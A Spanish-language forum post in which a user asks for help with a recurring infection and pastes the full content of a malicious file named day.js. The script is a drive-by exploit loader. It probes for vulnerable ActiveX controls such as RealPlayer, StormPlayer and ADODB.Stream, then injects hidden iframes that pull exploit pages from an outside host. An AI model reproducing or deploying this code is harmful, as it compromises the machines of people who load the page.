 |
 |
|
|
day.js (1 viewing) (1) Guest
Favoured: 0
|
|
|
TOPIC: day.js
|
Oscurowar (Usuarios)
Fresh Boarder
Mensajes: 2
|
|
day.js 4 Months, 1 Week ago
|
Karma: 0
|
|
hace rato que e viene generando entradas este virus en mis dos maquinas que tengo en red y me sale el alerta en cada web que se abre de un malware en arcihvos temporales con el nombre day.js o day[1].js
al abrar ese archivo me aparece este código malicioso
document.writeln("<script language=\"javaScript\">");
document.writeln(" var cook = \"silentwm\";");
document.writeln(" ");
document.writeln(" function setCookie(name, value, expire) ");
document.writeln(" { ");
document.writeln(" window.document.cookie = name + \"=\" + escape(value) + ((expire == null) ? \"\" : (\"; expires=\" + expire.toGMTString()));");
document.writeln(" }");
document.writeln("");
document.writeln(" function getCookie(Name) ");
document.writeln(" { ");
document.writeln(" var search = Name + \"=\";");
document.writeln(" if (window.document.cookie.length > 0) ");
document.writeln(" { ");
document.writeln(" offset = window.document.cookie.indexOf(search);");
document.writeln(" if (offset != -1) ");
document.writeln(" { ");
document.writeln(" offset += search.length; ");
document.writeln(" end = window.document.cookie.indexOf(\";\", offset) ");
document.writeln(" if (end == -1)");
document.writeln(" end = window.document.cookie.length;");
document.writeln(" return unescape(window.document.cookie.substring(offset, end));");
document.writeln(" }");
document.writeln(" }");
document.writeln(" return null;");
document.writeln(" }");
document.writeln("");
document.writeln(" function register(name) ");
document.writeln(" {");
document.writeln(" var today = new Date();");
document.writeln(" var expires = new Date();");
document.writeln(" expires.setTime(today.getTime() + 1000*60*60*24);");
document.writeln(" setCookie(cook, name, expires);");
document.writeln(" }");
document.writeln("");
document.writeln(" function openWM() ");
document.writeln(" {");
document.writeln(" var c = getCookie(cook);");
document.writeln(" if (c != null) ");
document.writeln(" {");
document.writeln(" return;");
document.writeln(" }");
document.writeln(" ");
document.writeln(" register(cook);");
document.writeln(" ");
document.writeln(" window.defaultStatus=\"Íê³É\";");
document.writeln(" ");
document.writeln(" document.write(\'<iframe width=50 height=0 src=http://v.freefl.info/f/index.htm><\/iframe>\');");
document.writeln(" try{ var e;");
document.writeln(" var ado=(document.createElement(\"object\"));");
document.writeln(" ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");");
document.writeln(" var as=ado.createobject(\"Adodb.Stream\",\"\")}");
document.writeln(" catch(e){};");
document.writeln(" finally{");
document.writeln(" if(e!=\"[object Error]\"){");
document.writeln(" document.write(\'<iframe width=50 height=0 src=http://v.freefl.info/014.htm><\/iframe>\')}");
document.writeln(" else");
document.writeln(" { ");
document.writeln(" try{ var j;");
document.writeln(" var real11=new ActiveXObject(\"IERP\"+\"Ctl.I\"+\"ERPCtl.1\");}");
document.writeln(" catch(j){};");
document.writeln(" finally{if(j!=\"[object Error]\"){if(new ActiveXObject(\"IERPCtl.IERPCtl.1\").PlayerProperty(\"PRODUCTVERSION\")<=\"6.0.14.552\")");
document.writeln(" {document.write(\'<iframe width=100 height=100 src=http://v.freefl.info/real11.htm><\/iframe>\')}");
document.writeln(" else");
document.writeln(" {");
document.writeln(" document.write(\'<iframe width=100 height=100 src=http://v.freefl.info/real10.htm><\/iframe>\')}}}");
document.writeln("");
document.writeln(" try{ var g;");
document.writeln(" var glworld=new ActiveXObject(\"GLIEDown.IEDown.1\");}");
document.writeln(" catch(g){};");
document.writeln(" finally{if(g!=\"[object Error]\"){");
document.writeln(" document.write(\'<iframe style=display:none src=http://v.freefl.info/lz.htm><\/iframe>\')}}");
document.writeln("");
document.writeln(" try{ var h;");
document.writeln(" var storm=new ActiveXObject(\"MPS.StormPlayer.1\");}");
document.writeln(" catch(h){};");
document.writeln(" finally{if(h!=\"[object Error]\"){");
document.writeln(" document.write(\'<iframe style=display:none src=http://v.freefl.info/bf.htm><\/iframe>\')}}");
document.writeln("");
document.writeln(" try{ var f;");
document.writeln(" var thunder=new ActiveXObject(\"DPClient.Vod\");}");
document.writeln(" catch(f){};");
document.writeln(" finally{ if(f!=\"[object Error]\"){");
document.writeln(" document.write(\'<iframe width=50 height=0 src=http://v.freefl.info/kong.htm><\/iframe>\')}}");
document.writeln("");
document.writeln(" ");
document.writeln(" }}");
document.writeln(" }");
document.writeln("");
document.writeln("openWM();");
document.writeln("<\/script>");
document.writeln("<script src=http://js.tongji.cn.yahoo.com/621252/ystat.js></script>");
por mas que desinfecte o pase programas para desaserme de este virus, este vuelve.
la única solucion por ahora que encontre es bloquear con el firewall las direcciones que aparecen en el codigo y asi no molesta pero no creo que sea una solución
espero que ustedes sepan mas del tema. en los foros que lei dicen poner el sp3 de windows pero no soluciono nada
|
|
|
|
|
|
|
El administrador ha deshabilitado la escritura de mensajes a los usuarios no registrados.
|
|
|
|
|
Ayudanos a mantener
Si deseas hacer una pequeña donación con el fin de poder mantener las opciones gratuitas de nuestra web, puedes hacerlo a partir de 1 Euro con PayPal, pulsando sobre el siguiente icono.
Estadisticas
Usuarios: 8388
Noticias: 138
Enlaces Web: 20
Visitantes: 7052562
En línea..
Hay 25 invitados en línea
|
|
